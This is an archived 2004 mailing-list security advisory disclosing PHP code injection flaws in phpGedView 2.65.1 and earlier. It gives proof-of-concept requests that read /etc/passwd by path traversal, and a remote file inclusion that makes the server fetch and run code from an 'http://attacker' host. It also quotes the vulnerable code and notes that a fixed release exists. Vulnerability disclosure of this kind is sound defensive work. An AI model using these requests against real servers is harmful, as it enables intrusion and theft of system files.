[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040129232733.GA5565@netvigilance.com>
Date: Fri, 30 Jan 2004 00:27:33 +0100
From: Cedric Cochin <cco@...vigilance.com>
To: submissions@...ketstormsecurity.org, vuln@...unia.com,
news@...uriteam.com, bugtraq@...urityfocus.com,
bugs@...uritytracker.com
Subject: PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
################################################################################
Summary :
phpGedView is an open source system for online viewing Gedcom information
(family tree and genology information). Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product. They enable a malicious user
to access arbitrary files or execute commands on the server.
################################################################################
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* phpGedView version 2.65.1 and prior
Release Date :
January 30, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
- -- HTTP Request --
Code impacted : editconfig_gedcom.php
61:if (empty($gedcom_config)) {
62: if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
63: else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);
The both GET/POST requets will work evenif PHP register_globals is Off.
-------------------------------------------
II - PHP Injection
(HIGH Risk no authentication needed)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM File used. Just perform
a http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.
The attacker has to create on his web site a directory call themes/standard, and
a file theme.php
For example: theme.php = <?php print "<?php phpinfo();?>" ;?>
and the request, will execute the phpinfo() command on the vulnerable target.
################################################################################
Vendor Status :
The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- --> http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< cco@...vigilance.com >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFAGZbZA9/8vqmWoYQRAmVrAJ9rd9L6WkO5FV9ufaMYj5mhk0uMXwCePwxS
+hdjG8/IGk+yoZje7W1I110=
=Gfdz
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists